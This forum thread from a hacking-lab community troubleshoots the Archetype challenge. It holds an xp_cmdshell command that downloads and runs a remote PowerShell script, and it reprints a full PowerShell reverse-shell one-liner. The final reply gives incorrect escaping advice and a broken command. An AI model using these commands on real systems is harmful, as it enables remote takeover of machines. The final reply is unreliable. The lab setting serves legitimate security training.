Starting Point Archetype Error: The ampersand (&) character is not allowed

Inspect · April 12, 2021, 12:44pm

Hey,

Trying to do the archetype starting point challenge but I end up getting the following error whilst doing the command:
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.12/shell.ps1\“);”

Error:

IEX : At line:1 char:275

… .ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex$data2>&1|Out-St …

The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double

quotation marks (“&”) to pass it as part of a string.

Does anyone know a fix? Followed the instructions as in the PDF. I tried doing it with quatation marks around it but still end up with errors.

Inspect · April 12, 2021, 2:48pm

//Fixed

Solution: Do not copy straight from the PDF and recheck every space if you do decide to copy the shell code.

Cork · July 13, 2021, 9:30am

@Inspect said:

//Fixed

Solution: Do not copy straight from the PDF and recheck every space if you do decide to copy the shell code.

Do you mind posting an actual fix, because I see this as a technical problem, not a spoiler.

davincy · July 14, 2021, 8:42am

Yea i bumped in to it and what @Inspect means is that the script that is in the PDF it doesnt have spaces i found a github account that has the same onliner for the powershell netcat script:

gist.github.com

https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3

powershell_reverse_shell.ps1

# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

happy hacking

RachelGomez · May 26, 2023, 6:11am

The error message you’re encountering suggests that the ampersand character “&” is causing an issue in the command. To fix this, you can try the following:

Escape the Ampersand: Instead of using a single ampersand, try escaping it by using two ampersands (“&&”). This way, it will be treated as a literal ampersand character instead of being interpreted as an operator.

Use Double Quotation Marks: Wrap the entire PowerShell command in double quotation marks to ensure that the ampersand is passed correctly as part of the string.

Here’s an example of how the modified command might look:

arduino
Copy code
xp_cmdshell "powershell ““IEX (New-Object Net.WebClient).DownloadString;””
By escaping the ampersand and using double quotation marks appropriately, you should be able to resolve the error and execute the command successfully.

Regards,
Rachel Gomez